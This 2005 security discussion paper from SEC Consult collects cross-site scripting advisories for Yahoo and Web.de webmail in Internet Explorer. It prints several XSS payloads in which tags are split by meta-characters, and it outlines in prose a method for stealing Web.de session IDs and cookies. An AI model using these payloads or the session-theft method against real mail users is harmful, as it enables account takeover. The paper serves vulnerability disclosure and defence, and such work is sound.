A Word on Webmail Security and Browser related XSS Bugs

SEC-CONSULT Security discussion paper 20051202-1

================================================================================

title: A Word on Webmail Security and Browser related XSS Bugs

program: Multiple Webmail Solutions

found: ---

by: SEC Consult Vulnerability Lab / www.sec-consult.com

affected vendors: Yahoo, Web.de

 

================================================================================

 

-----------

1. PREFACE:

-----------

 

As you all know, it is a tedious task to secure webmail services against

Cross Site Scripting attacks if they provide HTML email functionality.

 

Within the last few years a new type of XSS Attacks have emerged. The

combination of classic style XSS and incorrect HTML parsing of several Webbrowsers

(mostly MSIE) can lead to a dangerous situation for webmail systems as well as

other webapplications. Especially the insertion of non printable characters

like 0x00,0xff but also many others can be used to trigger such combined vulnerabilities.

 

Many vendors implement blacklist filters or other security measures, while

the root of the problem remains untouched. SEC Consult has been in touch with

various webmail vendors for quite some time, trying to make this point clear.

However, the situation has not changed as the security officers in charge do

not show much interest in the matter. The tenor of replies (if any) to our advisories

is that this is not a security issue or is impossible to exploit. Eventually,

specific Cross Site Scripting vectors will be quietly fixed, though, but it is

a matter of minutes to find a new one.

 

In this security information, we will address fixed and unfixed Cross Site

Scripting flaws of large scale webmail providers to add some proof for our ongoing

allegations.

 

-----------------------------------------

3. LATEST XSS VECTORS FOR YAHOO s WEBMAIL

-----------------------------------------

 

OUR LATEST YAHOO ADVISORY:

 

==========================================================

SEC-CONSULT Security Advisory 20051125-y8 Yahoo / MSIE XSS

==========================================================

 

Product: Yahoo Webmail in combination with MSIE 6.0(maybe other browsers)

Remarks: no other Versions tested but very likely vulnerable

 

Vulnerablities: Multiple XSS/Cookie-Theft/Relogin-trojan

 

Vendor: Yahoo

Vendor-Status: first time vendor contacted (2005.09)

Vendor-Patchs: patched in production environment

 

Object: MSIE (unknown version - 5.+)

 

Exploitable:

Local: ---

Remote: YES

Type: XSS - Cross Site Scripting - Cookie/Account Theft

 

============

Introduction

============

 

Yahoo-Webmail Vulnerability #8/2005

Followup for seclists.org/lists/bugtraq/2005/Oct/0263.html

 

=====================

Vulnerability Details

=====================

 

 

1) XSS / Cookie-Theft / Relogin Trojan

======================================

 

Yahoos blacklists fail to detect script-tags in combination with SPECIAL/META-Characters.

This leavas Webmail users using MSIE vulnerable to typical XSS / Relogin-trojan attacks.

 

Vulnerable TAG/ATTRIBUTTE

=========================

 

XML/DATASRC

 

 

Malicious HTML-Mail:

===========================================================================================================
XML-TAG / datasrc ATTRIBUTE:

---cut here---
<h1>Hola Seniores,</h1><br>\n<xml id=i><x><c><![CDATA[<img src="javas]]><![CDATA[cript:alert('Thank You ');
">]]></c></x></xml><span da[Some META-Char]tasrc=#i datafld=c dataformatas=html></span>
---cut here---
===========================================================================================================

 

===============

General remarks

===============

 

We would like to apologize in advance for potential nonconformities and/or known issues.

 

======================================

Recommended hotfixes for webmail-users

======================================

 

Do not use MS Internet-Explorer.

 

=================

Recommended fixes

=================

 

Do not use blacklists on tags and attributes. Whitelist special/meta-characters.

 

==============

Vendor-Patches

==============

 

vulnerability has been fixed in production environment.

 

 

 

 

.. and in addition some examples taken from our Yahoo webmail XSS Advisories from 2005.

================================================================================================
SCRIPT-TAG:
---cut here---
<h1>hello</h1><s[META-Char]cript>alert("i have you now")</s[META-Char]cript></br>rrrrrrxxxxx<br>
---cut here---
================================================================================================
OBJECT-TAG:
---cut here---
<objec[META-Char]t classid="CLSID:D27CDB6E-AE6D-11cf-96B8-444553540000">
<param name="movie" value="http://[somewhere]/yahoo.swf"></obje[META-Char]ct>
---cut here---
================================================================================================
ONERROR-Attribute:
---cut here---
<img src="http://dontexist.info/x.jpg" one[META-Char]rror="alert('i have you now')">uargg</p>
---cut here---
================================================================================================
ONUNLOAD-Attribute:
---cut here---
</body><body onun[META-Char]load=alert('i have you now')><br></br><p>somewords</p></body></html>
---cut here---
================================================================================================

 

... many more to come :)

 

 

--------------------------------

3. EXPLOITING XSS FLAWS / WEB.DE

--------------------------------

 

Web.de is one of Germany's biggest webmail/freemail provider. Running javascript HTML Mails can be done by trivial

standard tricks, however, web.de claims to be unexploitable due the security guards in place. Firsty, session validation

based on three variables, being the User-ID Cookie, the useragent, and the random session ID which is passed along in every

URL. As a second security measure, HTML Mails are loaded into their own frame from a different domain. This request is

validated with an encrypted one time token. Obviously, this makes it more difficult to steal the main session

GerID, because the victim's browser prevents the attacker's javascript code from cross domain scripting. Naturally, this

"protection" can be circumvented. In our proof of concept exploit, we first extract the original domain from document.referer.

We then use this information to open the main website in an iframe and leverage one of many other Cross Site Scripting

flaws on web.de. This gives us access to frame[0], where we can extract the session ID from any link. We then extract

the User-ID cookie and useragent by standard means and pass them to our cookie logger, along with the session ID.

 

 

THE FIRST WEB.DE ADVISORY:

 

REMARK:

 

When we wrote the first advisory for web.de we thought it would be necessary to use a combination - attack (Browser/XSS).

After a while we found out that you can achieve the same goals without using special/meta characters.

 

===========================================================

SEC-CONSULT Security Advisory 20051125-w1 Web.de / MSIE XSS

===========================================================

 

Product: Web.de Freemail in combination with MSIE 6.0 (probably other browsers)

Remarks: no other versions tested but very likely vulnerable

 

Vulnerablities: Multiple XSS/Cookie-Theft/Relogin-trojan

 

Vendor: Web.de (Part of United Internet)

Vendor-Status: first time vendor contacted (2005.08)

Vendor-Patchs: unpatched (Vendor does not consider XSS as a vulnerability)

 

Object: MSIE (unknown version - 5.+ / other Browsers maybe affected too)

 

Exploitable:

Local: ---

Remote: YES

Type: XSS - Cross Site Scripting - Relogin Trojan - Cookie/Account Theft

 

============

Introduction

============

 

Web.de is one of the largest freemail provider for the german speaking area.

Web.de - Webmail/Freemail Vulnerability #1/2005

 

=====================

Vulnerability Details

=====================

 

 

1) XSS / Cookie-Theft / Relogin Trojan

======================================

 

Web.de s blacklists fail to detect script-tags in combination with SPECIAL/META-Characters.

This leaves Freemail users using MSIE (and most likely many other browsers) vulnerable to

typical XSS / Relogin-trojan attacks. The people from web.de try to hide their authentication

tokens in another subdomain which is of course not a real measure of security but much more

"security by obfuscation". Even if this precaution would prevent users from stealing session-id s

and cookies it would never be sufficient against relogin-trojan attacks!

 

 

Vulnerable TAG/ATTRIBUTTE

=========================

 

MANY(most likely every one which can be used to inject java/vbscripts)

 

How to create a malicious HTML-Mail using perl to exploit this vulnerability (this part of the advisory has

been modified for this discussion paper):

==============================================================================================================================

Milk is for babies. When you grow up you have to drink beer.

 

 

 

// if you are a security/jscript professional its an easy task to get a readable plaintext version of this :-)

// please remove linefeeds for proper functionality

==============================================================================================================================

 

===============

General remarks

===============

 

We would like to apologize in advance for potential nonconformities and/or known issues.

 

======================================

Recommended hotfixes for webmail-users

======================================

 

Do not use web.de s freemail.

 

=================

Recommended fixes

=================

 

Do not use blacklists on tags and attributes. Whitelist special/meta-characters.

 

==============

Vendor-Patches

==============

 

Vulnerability has not been fixed in production environment.

 

Remark regarding our disclosure policies:

 

Normally SEC-Consult's disclosure policy forbids making vulnerabilities public before they are fixed.

 

In a couple of telephone calls, with a LETTER and many e-mails the people from web.de could not be

convinced that Cross Site Scripting is a security vulnerability. Since it is not very likely that

a fix will be made available soon we would like to inform the users of web.de about this serious issue.

 

----------------------------------------

4. RECOMMENDED FIXES FOR WEBMAIL VENDORS

----------------------------------------

 

You must employ whitelist filters. Meaning: Do not rely on filtering "script", "javascript" and specific exploits.

Deny HTML tags by default, then allow the basic required tags and validate each of them. SEC Consult and other security

professionals will not hesitate to give you free advice on how to implement this correctly.

 

------------------

5. GENERAL REMARKS

------------------

 

We would like to apologize in advance for potential nonconformities and/or known issues.

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

SEC Consult Unternehmensberatung GmbH

Office Vienna

Blindengasse 3

A-1080 Wien

Austria

 

Tel.: +43 / 1 / 409 0307 - 570

Fax.: +43 / 1 / 409 0307 - 590

Mail: office at sec-consult dot com

www.sec-consult.com

 

EOF SEC Consult Vulnerability Lab / @2005

research at sec-consult dot com